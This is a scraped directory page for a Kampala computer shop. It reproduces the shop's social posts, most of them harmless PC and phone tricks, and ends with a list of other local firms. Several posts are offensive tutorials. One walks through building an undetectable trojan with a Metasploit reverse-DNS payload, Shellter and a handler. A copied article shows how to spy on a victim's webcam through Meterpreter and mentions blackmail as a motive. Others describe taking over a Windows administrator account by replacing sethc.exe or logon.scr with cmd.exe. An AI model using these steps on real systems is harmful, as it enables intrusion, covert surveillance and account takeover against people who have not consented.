Titan Ug

Contact information, map and directions, contact form, opening hours, services, ratings, photos, videos and announcements from Titan Ug, Computer Company, kampal,Uganda, Kampala.

[08/01/19]   We are currently under renovation
We will get back when we're done

[06/27/18]   Unlimited internet valid for 3months will be ready on Saturday

[05/27/17]   We give u the best services

[05/18/17]   Airet and MTN sim registration
This Alert Goes out to those who haven't registered their sim
card due to not having a NATIONAL ID you only have today
to register
WhatsApp: 0751030195
Call: 0751030195
Validation is done by NIRA

[01/24/17]   will be postiing on how to inject an SQL data base

20/09/2016

YouTube In MP4 - Download YouTube videos in MP4 format

How To Download Videos On Youtube Fast and Free without any Software
Youtube is getting so much Popular, many guys try to download Youtube videos but they fail to download videos as youtube doesn't allow download support but Today we are gonna discuss about "How To Download Videos On Youtube Fast and Free without any Software
" In this trick we are not going to use any software like IDM [Internet Download Manager] or Youtube Downloader. We are going to use a website to download our Videos for free with high speed. This is the most secure and best way of downloading youtube videos totally Free. So lets learn How to Do It.How To Download Youtube Video Without Any Software ?
1. You need to go find the link of your desired Youtube video. How to find this ? just see it in address bar.

Subscribe Youtube click on this link

2. Now copy your video link and Go to www.youtubeinmp4.com


3. Then paste the copied link in the address box, Hit Download button.

Now that's it, you are done, Enjoy Your Youtube Video Download For Free !You can share this post with your friends and also subscribe Our Newsletter for Latest and Most Unique Internet, Computer, Blogger Tricks !I hope you would like this simple trick, If you have any problems please comment below or simply share your thoughts :-)

2 nd Trick
1. You need to go find the link of your desired Youtube video.How to find this just see it in address bar.

Subscribe Youtube click on this link
2. Now copy your video link and Go to www.savefromenet.net

3. Then paste the copied link in the address box, Hit Download button.
Note : For keepvid.com downlode java and allow permision " run always trusted "
Now that's it, you are done, Enjoy Your Youtube Video Download For Free !You can share this post with your friends and also subscribe Our Newsletter for Latest and Most Unique Internet, Computer, Blogger Tricks !I hope you would like this simple trick, If you have any problems please comment below or simply share your thoughts :-) -

©2016 Titan Inc.

youtubeinmp4.com With YouTube In MP4 You can easily download any YouTube video in MP4 format to your computer, in a matter of seconds!

[09/20/16]   To make your own live disco, follow the steps given below:-

1. Open Notepad.
2. Copy paste the exact code given below:-
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
3. Save the file as Disco.vbs or "*.vbs".
Double click on the Saved file to see the LED lights on your
keyboard go crazy and make your own cool disco

©2016 Titan Inc.

[09/20/16]   how to hide Text Message in any image file.

Hi Guys.
This is an awesome trick and very easy one
too. IF you wish
to send a text message to you friends
privately or you
yourself want to hide a text message in

image file then this
article will help you a lot.
After hiding the message in a image file
there will be no
damage to the file just the size of the file
will increase a
bit.
So lets check how it is done.
First of all open run and type cmd., click
enter. This will
open Command promt.
Now you have to navigate to the folder
where you have
copied the files(1 .jpg file and 1 txt file
which contains your
message.)
For example, if your files are in “D” drive,
then after
opening cmd, type, D: and hit enter, now you
are in your d
drive, now if your folder name is Photos then
type “cd
photos” (without quotes) now you are in
photos folder.
Now main step. Type this command after
navigating to the
folder.
copy /b imagefilename.jpg + textfilename.tx
t
outputimagename.jpg
Type the exact code, but dont forgot to
replace the few
words, imagefilename.jpg with your image
file name and
with proper extension, textfilename.txt with
your text file,
outputimagename.jpg your output image
name, use
whatever you want, but remember to use
right extension.All
done by now your message has been hiden in
you image
and a new folder will be created in the same
folder with the
name you wrote in place of outputimagename
.jpg.
As everything is done by now. you must be
thinking how to
view the message now.
dont worry we will see that too. its very
simple .
You just have to open the output file with
notepad, scroll
down to the bottom. check the last line.
you message will be displayed there. -

©2016 Titan Inc.

09/09/2016

172.27.121.200

Airtel free net proxy

Name : Airtel
Apn: internet
proxy address :172.27.121.200
port :8080
and save

remember u can browse freely download but u can use whatsapp and other apps

172.27.121.200

[09/09/16]   How to create a trojan horse virus

Things You Will Need:

Kali Linux
Windows
A No IP account with a domain name
A forwarded port on your router
Shellter

Part 1: Creating the DNS Payload

Using Kali:

Open Metasploit on Kali by typing msfconsole in a terminal.
Type use payload/windows/meterpreter/reverse_tcp_dns.
Type show options. This will show you that you need to set your lhost and lport.
Type set lhost (hostname you created, without http://).
Type set lport (port you have forwarded on your router set for the Kali machine).
Type generate -h. This will show you the options for generating the payload. You can choose different options but at least do the following.
Type generate -f (file name you choose for the payload) -p windows -t raw. Ex. generate -f DNS -p windows -t raw
Exit the terminal and click on Files. Your payload will be in your Home (Unless you set an option for a different location).
Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).

Part 2: Creating the Executable File in Windows

Choose option that applies to you. (Important as Shellter does not work with 64-bit executables).

32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator)
64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (Right click and select run as administrator)

Choose Create new Self Extraction Directive File and click next.
Click next on the Package Purpose page.
Type the title of the package. (This can be anything you want) Ex: Notepad.exe
No Prompt, click next.
Do not display a license. Click next.
Click Add and choose any file on your computer. I choose Notepad.exe in the C:\Windows\System32 folder. Click Next.
Click the drop arrow and choose the file name you choose on the last screen. Click Next.
Choose Hidden and then click next.
No Message. Click Next
Click Browse and type a name for your malware file and a destination. Check the Hide File Extracting Progress Animation from user. Click Next.
Select No restart and then click next.
You can then either choose to save the self extraction directive or don't save. Click Next.
Click Next again on the create Package. Then click Finish.

Part 3: Using Both Created Files in Shellter to Create Your Trojan

Open the folder that Shellter is in. Right click on Shellter.exe and click Run as Administrator.
Type A for Auto.
Type N for No.
Type the location of your created EXE file from Part 2 and hit enter. Let Shellter do it's thing for 30 seconds to a minute.
When asked to choose payload, type C for custom.
Type the location of your created payload in Part 1 and hit enter.
Type N for No reflective DLL loader.
Hit enter and let Shellter finish doing it's thing If it says Injection Verified! you should have a working undetectable Trojan.
Hit enter to exit Shellter.

Part 4: Set Up Your Listener

You can either use Metasploit or Armitage. I prefer Armitage so my tutorial will be for that.

Go back to Kali.
Open Terminal and type Msfupdate
Once it's done type apt-get install armitage.
Type msfdb init
Open Armitage
Click Connect
Click Yes
Once Armitage opens type: use exploit/multi/handler
Type set lhost 0.0.0.0
Type set lport (your port you forwarded in your router)
Type set payload windows/meterpreter/reverse tcp dns
Type set exitonsession false
(Optional.) Type set autorunscript migrate -f
(Optional.) Type set prependmigrate True
Type exploit -j

(Optional steps are to migrate the process automatically so the session does not end before you can do it manually)

Now you should be able to run your undetectable Trojan and get a Meterpreter session.

DO NOT Upload your created Executable to online sites such as Virus Total.

[09/09/16]   How to Secretly Hack Into, Switch On, & Watch Anyone's We**am Remotely
occupytheweb
occupytheweb
2 months ago

Welcome back, my hacker novitiates!

Like in my last article on remotely installing a keylogger onto somebody's computer, this guide will continue to display the abilities of Metasploit's powerful Meterpreter by hacking into the victim's we**am. This will allow us to control the we**am remotely, capturing snapshots from it.
Image by TheAlieness GiselaGiardino23/Flickr

Why exactly would you want to hack into somebody's we**am? Maybe you suspect your significant other of having a fling. Or, maybe you're into blackmailing. Or, maybe you're just a creep. But the real purpose is to show just how easy it is, so you're aware that it can be done—and so you can protect yourself against it.

Unlike just installing a command shell on the victim computer, the Meterpreter has the power to do numerous and nearly unlimited things on the target's computer. The key is to get the Meterpreter installed on their system first.

I've shown how to do this in some of my previous articles, where you could get the victim to click on a link to our malicious website, send a malicious Microsoft Office document or Adobe Acrobat file, and more.

So, now let's fire up Metasploit and install Meterpreter on the victim's system. Once we have done that, we can then begin to view and capture images from their we**am.
Step 1List the Victim's We**ams

Metasploit's Meterpreter has a built-in module for controlling the remote system's we**am. The first thing we need to do is to check if there is a web cam, and if there is, get its name. We can do that by typing:

meterpreter > we**am_list

If he/she has a we**am, the system will come back with a list of all the we**ams.
Step 2Snap Pictures from the Victim's We**am

Now that we know he/she has a we**am, we can take a snapshot from the we**am by typing:

meterpreter > we**am_snap

The system will now save a snapshot from her we**am onto our system in the directory /opt/framework3/msf3, which we can open and see what's going on.
Image by Daquella manera/Flickr

The quality of the image saved all depends on your victim's we**am and surroundings.
Step 3Watch Streaming Video from the Victim's We**am

Now that we know how to capture a single snapshot from the victim's we**am, we will now want to run the we**am so that we can watch a continuous video stream. We can do this by typing;

meterpreter > run we**am -p /var/www

This command starts his/her we**am and sends its streaming output to /var/www/we**am.htm.

[08/14/16]   how to hack admin
password in the basic way.If that doesn't work ,
you can try this new and advance method to
hack administrator password.
>>Go to Start>Run , type cmd to open command
prompt >>Enter this command cd\ to make directory to C:
(default drive)
>>Now enter this command cd windows
\system32 , to change the directory in command
prompt to C:\windows\system32
>>Now type mkdir temphack to make a temporary directory for backup
Admin Hack
>>Then , type copy logon.scr temphack\logon.scr
to copy logon.scr to temphack folder
>>Now type copy cmd.exe temphack\cmd.exe
copy cmd.exe to temphack folder >>Then type del logon.scr to delete logon.scr . The
backup of this file is in the folder temphack
>>Now type rename cmd.exe logon.scr to
rename command prompt to logon screensaver
>>Now you get unprotected command prompt
without logging in when windows loads logon screensaver at startup
>>When command prompt appears enter this
command
net user admin infinitepc
>>Now you have hacked admin account and his/
her password is set to infinitepc >>After you have hacked admin you can restart
and login with hacked administrator password
Note:
*Dont forget the spaces involved in all the above
commands
*To restore this hack just go to temphack folder found in windows\system32 directory and copy
those two files in that folder and paste those files
in system32 folder(overwrite those files in this
folder)
*The above hack works mostly on FAT/FAT 32
systems not on NTFS systems.

[04/28/16]   103.247.217.52

use the follwoing proxy

PROXY SERVERS PORTS
103.19.229.194 80
103.246.0.240 8080
103.19.79.185 8080
103.16.132.42 8080
103.39.49.74 80
103.247.103.226 3128
103.246.1.150 80
103.12.84.111 3128
101.255.82.66 8080
103.30.84.90 80
103.10.63.224 80
103.255.121.194 80
103.10.80.69 80
103.247.217.52 80

©2016 Titan Inc.

[04/17/16]   Hello people there are new tricks am going to be posting very soon so please wait

[02/09/16]   ow to Enable or Activate WhatsApp Voice Calling Feature Step 1: Make sure you have the right version of WhatsApp. Step 2: Open terminal emulator app (available in Google Play store for free) on your Android phone. Step 3: Now execute the following HTML code in your Android phone as given below or check the below image. su am start -n com.whatsapp/com.whatsapp.Hom eActivity Step 4: That's it, now WhatsApp Voice Calling Feature enabled. Step 5: Now WhatsApp will launch with the new user-interface having the Voice Calling Feature, however this will not enable the call functionality unless someone who already has this feature calls you, in order to activate the voice calling feature for you Conclusion This feature works ONLY when someone who already has this feature, calls you, only then you can activate this feature for your mobile. To make voice calls in WhatsApp, the receiver must also have enabled the calling feature

©2016 Titan inc

[01/27/16]   many of u missed this

Hackers University How to hack admin account through guest account. 1) Go to C:/windows/system32. 2) Copy cmd.exe and paste it on desktop. 3) Rename cmd.exe to sethc.exe. 4) Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes. 5) Now Log out from your guest account and at the user select window,press shift key 5 times. 6) Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open. 7) Now type “ NET USER ADMINISTRATOR “zzz” where “zzz” can be any password you like and press enter. You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password

©2016 Titan Inc

[01/22/16]   WhatsApp – a very popular cross-platform instant messaging tool – is available on the iPhone and iPod touch but, sadly, isn’t available for the iPad. However, a tweak that goes by the name of WhatsPad allows the app in question to work on the iPad and that is what we’ll be talking about in this post.

Developed by an iOS developer who goes by the name of Lee, WhatsPad removes the “artificial” restriction that WhatsApp has which doesn’t allow it to be used on iPads.

From the app’s page on Cydia:

Enables WhatsApp to run on iPad and iPad 2, this works on both Wifi and Wifi+3G models. There are no settings or icons for this tweak, simply purchase and install WhatsApp.

How To Install WhatsApp And WhatsPad On Your iPad

You will, of course, need a jailbroken iPad for this to work. Apple and developers of WhatsApp haven’t approved the tweak yet so jailbreaking is an absolute must:

You can follow our step by step guide posted here to jailbreak your iPhone, iPad or iPod touch on iOS 4.3.5 using Redsn0w (or PwnageTool), or on iOS 4.3.4 using Redsn0w or PwnageTool (iPhone, iPad, iPod touch), or iOS 4.3.3 using Redsn0w, PwnageTool, Sn0wbreeze & JailbreakMe (that last one being the easiest). If you’re already using iOS 5 beta, you can jailbreak it using tools like Redsn0w (for Mac and Windows), or Sn0wbreeze.

Note: Since WhatsApp is an iPhone-only app, therefore in most cases, you wont be able to download it on the iPad directly from the App Store. Before you do anything, you need to follow the steps given below exactly as written to install WhatsApp on your iPad.

Step 1: Download and install the iPhone Configuration Utility from the links given below.

iPhone Configuration Utility for Windows
iPhone Configuration Utility for Mac
Step 2: Connect your iPad with your Mac or PC.

Step 3: Download WhatsApp for iPhone on your PC or Mac using iTunes.

Step 4: Now launch the iPhone Configuration Utility. On the left hand side, you will see your connected iPad; click on it.
Step 5: Click on Applications from the tabs you see at the top of your screen.

Step 6: Click on Add at the top left and browse for the WhatsApp IPA file you download in Step 3. It can be found under the iTunes Media > Mobile Applications folder.

Step 7: Scroll down and click on Install. WhatsApp will appear on your iPad’s Springboard.

Step 8: On your iPad, open up Cydia and install WhatsPad tweak from the BigBoss repository.

Once the WhatsPad tweak has been installed, you may launch the WhatsApp app from your homescreen and it will work the way it works on your iPhone. Also keep in mind that WhatsApp will ask you to enter a 3-digit PIN for activation which you’ll receive in a text message, therefore be sure to activate WhatsApp using your active phone number on which you can receive text messages in order to get the PIN.

©2016 Titan Inc.

Category

Telephone

Address


Kampal,Uganda
Kampala
256
Other Computer Companies in Kampala (show all)
Voste Solutions Ltd Voste Solutions Ltd
Plot 65 Yusuf Lule Roadi777ujjjjmmhhhhhhhhhhhh
Kampala, P.O BOX 35572

VosteSolutions Ltd was Founded in January 2011 as an ICT Security ,Software Engineering and ICT consultancy company. It has stood the test of TIME...

Kyta labs Kyta labs
Jinja Road
Kampala

Kyta Labs is a web and mobile app development company located in lugogo UMA showgrounds at finafrica on UWEAL house

Security Beyond UG Security Beyond UG
SK House, Plot 397 Kireka - Namugongo Road
Kampala, [email protected]

Hi- Tech Electronic Security Proffesionals

BILLA Systems Ltd BILLA Systems Ltd
Kireka Kinawataka Road
Kampala, +256

Billa systems LTd is a company dealing in Research consultancy System/software & web designing and development Computer training Mentainance Graphics Data mgt

Godwincom Technologies  Ltd Godwincom Technologies Ltd
Ham Towers Building
Kampala, 256

all I T solutions

Masterlinks. Masterlinks.
Kampala, 26988

Offering I.C.T training,offering certifications in MCSE,COMPtia,MCITP etc,I.T RELATION MANAGEMENT TRAINING workshop...Partner with you for results that count.

Golden Links Pro Computer Services Golden Links Pro Computer Services
Nasser Rd Ug
Kampala, 256

We Do printing,Computer Repairs,Soft ware installing,Updates,Graphic Designing,Printing of all Kinds I.e Cloth,paper banner Reflectors,stickers,T - shirts

Hightech Masters Hightech Masters
Plot-77/78 Kampala Road, E-Tower Building
Kampala, 256

A Ugandan Owned - IT- Company established by a Professional with a Passion for Internet Based Development | Software & Web Design | Networks & Server Mgt

Milima Security Milima Security
Plot M445, Ntinda Road
Kampala, P.O BOX 25760 KAMPALA

Cybersecurity Firm

KAINGroup Ltd. KAINGroup Ltd.
USSIA House
Kampala, 256

KAINGroup Ltd. is a total IT service delivery and consultancy company. The company was conceived in 2008 and incorporated in 2009 by a team of highly trained and talented professionals

RAP Software Solutions RAP Software Solutions
Kampala
Kampala, 29596

Developing all software solutions for generations

Guarta Technologies Guarta Technologies
Rashid Khamis Road, Old Kampala
Kampala, 256

We opt to be a one stop IT solutions provider - Security Hardware install, repair, servicing and maintenance. - Software dev't, design and management.